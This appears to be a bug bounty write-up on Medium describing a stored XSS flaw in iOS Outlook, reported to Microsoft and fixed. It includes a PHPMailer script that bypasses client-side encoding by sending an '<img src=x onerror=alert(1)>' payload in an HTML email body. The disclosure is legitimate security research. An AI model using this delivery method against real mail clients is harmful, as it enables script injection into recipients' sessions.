iOS Outlook Stored XSS Write-Up($3000)

kminthein
kminthein
May 28, 2020 · 2 min read

Staying home is really nightmare for me and I am so boring to learn new things. So, I decided to write a writeup about how I found stored XSS in Micorsoft outook and got some bounty $3000.

I stopped hunting bugs since last 3 years ago after I got some bounty from Yahoo, Tumblr ..etc. Last few months ago, my old tested payload from shopify pop-up in my Microsoft outlook email. So I started to dig around, I sent every XSS payload including polyglots to my Microsoft account but nothing seems showing an alert. After hours of struggling, I reported to MSRC with below message, lol. I though I am idiot.

And as expected, MSRC reply need more info. I know there is XSS bug in Microsoft outlook and I just didn’t found the endpoint. After thinking some hours, I started thinking about what if sending email client validate and encode my payload?. If my payload is standardized from sender side, there won’t be no vuln point in receiver side which is Microsoft outlook. So I decided to write a simple php script in order send my message to outlook.

The script that I used to send XSS payload to outlook is below.

<?php
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;
require ‘vendor/autoload.php’;
$mail = new PHPMailer(true);
try {
//Server settings
$mail->SMTPDebug = 2;
$mail->isSMTP();
$mail->Host = ‘smtp.gmail.com’;
$mail->SMTPAuth = true;
$mail->Username = ‘mymail@gmail.com’;
$mail->Password = ‘mypassword’;
$mail->SMTPSecure = ‘tls’;
$mail->Port = 587;
//Recipients
$mail->setFrom(‘mymail@gmail.com’, ‘kmt’);
$mail->addAddress(‘receiver@outlook.com’, ‘’);
//Content
$mail->isHTML(true);
$mail->Subject = ‘XSS POC’;
$mail -> Body = “<img src=x onerror=alert(1)>”;
$mail->send();
echo ‘Message has been sent’;
} catch (Exception $e) {
echo ‘Message could not be sent. Mailer Error: ‘, $mail->ErrorInfo;
}
?>

After firing the script and watch my outlook mail box. Boom, XSS and seems office365 is also affected.

You can view PoC video from here.

After fixing the bug I was awarded $3000 from MSRC.

Conclusion

In above scenario, I strongly believe my sender email client encode my payload before sending to outlook there is no more XSS in outlook. So I choose to write simple PHP script with PHP mailer.

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store